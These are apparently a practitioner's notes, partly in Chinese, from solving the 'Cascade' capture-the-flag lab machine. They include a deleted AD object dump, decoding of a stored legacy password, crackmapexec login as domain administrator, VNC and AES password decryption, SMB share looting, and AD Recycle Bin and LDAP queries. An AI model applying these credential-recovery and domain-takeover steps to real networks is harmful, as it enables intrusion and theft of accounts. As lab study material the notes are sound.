Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : TempAdmin@cascade.local
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
cascadeLegacyPwd
找到 TempAdmin 用户的密码,在之前的会议记录中有说密码与管理员密码相同。
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles
crackmapexec smb 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)
Other
scriptPath: MapDataDrive.vbs
sudo apt install libhivex-bin
逆向程序那里也可以打断点,写上输出值的函数。
Writeup
sqlite3 查询语法通用。
select * from DeletedUserAudit;
select * from Ldap;
select * from Misc;
Decrypt VNC Password
echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
/opt/vncpwd/vncpwd vnc_enc_pass
/opt/vncpwd/vncpwd <(echo '6bcf2a4b6e5aca0f' | xxd -r -p)
C# Online
在线执行 C# 代码
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class Program
{
public static void Main()
{
string str = string.Empty;
str = DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321");
Console.WriteLine(str);
}
public static string DecryptString(string EncryptedString, string Key)
{
byte[] buffer = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
((SymmetricAlgorithm) aes).KeySize = 128;
((SymmetricAlgorithm) aes).BlockSize = 128;
((SymmetricAlgorithm) aes).IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
((SymmetricAlgorithm) aes).Mode = CipherMode.CBC;
((SymmetricAlgorithm) aes).Key = Encoding.UTF8.GetBytes(Key);
using (MemoryStream memoryStream = new MemoryStream(buffer))
{
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, ((SymmetricAlgorithm) aes).CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] numArray = new byte[checked (buffer.Length - 1 + 1)];
cryptoStream.Read(numArray, 0, numArray.Length);
return Encoding.UTF8.GetString(numArray);
}
}
}
}
Breakpoint
smbclient -U 's.smith%sT333ve2' //10.10.10.182/Audit$
smb: \> mask
smb: \> mask ""
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
下断点时需要添加参数
AD Recycle Bin
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
LDAP Search Tricks
使用 grep 选出 dn 中有 users 的结果
ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" | grep 'dn' | grep -i 'users'
将以下内容放入 ldap 查询中,选出所有用户。
OU=Users,OU=UK,DC=cascade,DC=local
- grep 扩展
# grep 似乎不能直接使用 AND 符号
awk '/dn/ && /Users/ { print; }' ldap/ldapsearch.txt
awk '/dn/ && /Users/ { print; $found = 1} END {exit !found}' ldap/ldapsearch.txt
grep -e 'dn.*Users' -e 'Users.*dn' ldap/ldapsearch.txt
grep -e 'dn.*Users' ldap/ldapsearch.txt
regular expression - How to run grep with multiple AND patterns? - Unix & Linux Stack Exchange
linux - How to run multiple AND in grep command - Unix & Linux Stack Exchange
ArkAdRecycleBin.log
该文件还有一些提示
Running as user CASCADE\ArkSvc 以 ArkSvc 用户的身份运行
Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local 删除了 TempAdmin 帐户,该帐户域管理员帐户的密码相同。
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
CyberChef AES
mount and pwsh
将 smb 挂载到本地然后使用 powershell 中的函数搜索关键词,因为一些文件可能使用 UTF-16 编码,使用 grep 可能错过一些东西。所以需要使用适用于 Linux 的 Powershell, Select-String 函数自动扫描 UTF-8 和 UTF-16 编码的字符串。
sudo mount -t cifs -ousername=r.thompson -opassword=rY4n5eva //10.10.10.182/Data /mnt
get-childitem -recurse | select-string -pattern password